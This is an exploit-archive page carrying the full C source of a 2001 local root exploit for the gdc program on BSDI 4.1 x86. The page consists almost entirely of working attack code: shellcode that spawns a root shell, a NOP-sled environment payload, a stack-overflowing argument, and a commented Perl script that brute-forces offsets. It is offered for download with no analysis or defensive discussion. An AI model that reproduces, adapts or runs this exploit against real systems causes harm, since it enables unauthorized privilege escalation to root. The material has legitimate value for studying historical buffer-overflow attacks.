what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

hhp-gdc_smash.c

hhp-gdc_smash.c
Posted Mar 6, 2001
Authored by Loophole, hhp | Site hhp-programming.net

Hhp-gdc_smash.c is a local root exploit for gdc. Requires group wheel access. Tested on BSDI 4.1 x86 default install.

tags | exploit, x86, local, root
SHA-256 | 59ac3f8c25947407d2c2124b1b923963380381d66406ef270bdd57b3c00baae5

hhp-gdc_smash.c

Change Mirror Download
/*********************************************************************
* (gdc) Local root[uid=0] exploit tested on BSDi 4.1 - x86. *
* "Requires access to group=(wheel)" *
* Author: Cody Tubbs (loophole of hhp). *
* Site: http://www.hhp-programming.net/ *
* Email: pigspigs@yahoo.com *
* Date: 2/23/2001 12:52:10 PST *
* Bug found by: skeptik. (One of my roomates). *
*********************************************************************/

/* ------------- hhp-offset_bruteforce.pl ---------------
#!/usr/bin/perl
#Standard offset/align brute.
if(@ARGV < 3){
print "Usage: $0 <start> <stop> <align>\n";
print "Examp: $0 -10000 0 0\n";
print "Notes: align = 0 through 3\n";
exit(0);
}

($start, $stop, $align) = @ARGV;
for(;$start<=$stop;$start+=4){
system "./x $start $align";
}
**********************************************/

#include <stdio.h>

#define PATH "/usr/contrib/bin/gdc" // Change if needed.
#define OFFSET -4000 // Worked for me, brute if fails.
#define ALLIGN 0 // Shouldn't need to be change.
#define NOP 0x90 // x86.
#define DBUF 1024 //987+4(EIP).

static char shellcode[] = // BSDi (Replace with setuid, etc code).
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02/bin/sh.-c.sh\x69";

long get_sp(void){
__asm__("movl %esp,%eax");
}

void workit(char *heh){
fprintf(stderr, "(gdc) local root[uid=0] exploit (tested on BSDi 4.1 - x86).\n");
fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n");
fprintf(stderr, "Bug by: skeptik <skeptik@hushmail.com>.\n");
fprintf(stderr, "Usage: %s [offset] [allign(0..3)]\n", heh);
}

int main(int argc, char **argv){
char eipeip[DBUF], buffer[4096], heh[DBUF+1];
int i, offset, gid, allign;
long address;

workit(argv[0]);

if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

address=get_sp()-offset;

if(allign>0){
for(i=0;i<allign;i++){
eipeip[i]=0x69; //0x69(tm) HEH.
}
}

for(i=allign;i<DBUF;i+=4){
*(long *)&eipeip[i]=address;
}

for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
buffer[i]=NOP;
}

memcpy(buffer+i,shellcode,strlen(shellcode));
memcpy(buffer,"GDCEX=",6);
putenv(buffer);
fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign);
execlp(PATH, "gdc", "-t", eipeip, 0);
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close